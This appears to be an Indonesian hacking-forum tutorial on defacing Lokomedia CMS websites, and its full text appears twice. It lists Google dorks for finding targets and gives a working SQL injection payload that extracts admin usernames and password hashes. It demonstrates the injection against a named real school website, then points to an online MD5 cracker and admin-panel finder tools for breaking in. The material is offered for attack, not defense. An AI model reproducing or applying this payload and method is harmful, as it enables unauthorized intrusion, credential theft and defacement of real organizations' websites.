Deface POC SQL Lokomedia
Assalamualaikum Gaess.... :*
Kali Ini gw mau Ngasih Tutor, Deface Metode SQL Lokomedia, Bukan Lokomotif Loh :v
Langsung aja, Nih gw kasih Dork, Selanjutnya Kembangin sendiri, pake Otak Religius lu :*
Dork :
inurl:kategori-2-
inurl:kategori-40-
inurl:semua-berita.html
inurl:hal-tentang-kami.html
inurl:semua-agenda.html
inurl:statis-?-profil.html
Exploit :
'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Pertama Dorking dulu lahhhh.......
Pilih web, terus lu Tambahin Exploit, Nih
Webnya Ini http://smp4panggang.com/statis-6-videopekon.html
kalo ditambahin Exploit jadi Gini
http://smp4panggang.com/statis-6'union+select+make_set(6,@:=0x0a,%20%20%20(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-videopekon.html
Nah Kita liat Tiitle nya, Kali Berubah Berarti VULN :v
Kalo dah gitu, kita View Source, ntar ketemu User Pw admin, Password Masih Berupa md5, kita hash dulu di https://hashkiller.co.uk/md5-decrypter.aspx
Nahh.... Tuh... Tinggal cari Panel admin Doang..
Pake Acunetix, Havij, admin Finder dkk juga bisa Kok...
Udah.. Sekian Dari gw., Jika ada kesalahan.. Mohon Maaf :)
Wassalamualaikum :*
Kali Ini gw mau Ngasih Tutor, Deface Metode SQL Lokomedia, Bukan Lokomotif Loh :v
Langsung aja, Nih gw kasih Dork, Selanjutnya Kembangin sendiri, pake Otak Religius lu :*
Dork :
inurl:kategori-2-
inurl:kategori-40-
inurl:semua-berita.html
inurl:hal-tentang-kami.html
inurl:semua-agenda.html
inurl:statis-?-profil.html
Exploit :
'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Pertama Dorking dulu lahhhh.......
Pilih web, terus lu Tambahin Exploit, Nih
Webnya Ini http://smp4panggang.com/statis-6-videopekon.html
kalo ditambahin Exploit jadi Gini
http://smp4panggang.com/statis-6'union+select+make_set(6,@:=0x0a,%20%20%20(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-videopekon.html
Nah Kita liat Tiitle nya, Kali Berubah Berarti VULN :v
Kalo dah gitu, kita View Source, ntar ketemu User Pw admin, Password Masih Berupa md5, kita hash dulu di https://hashkiller.co.uk/md5-decrypter.aspx
Nahh.... Tuh... Tinggal cari Panel admin Doang..
Pake Acunetix, Havij, admin Finder dkk juga bisa Kok...
Udah.. Sekian Dari gw., Jika ada kesalahan.. Mohon Maaf :)
Wassalamualaikum :*
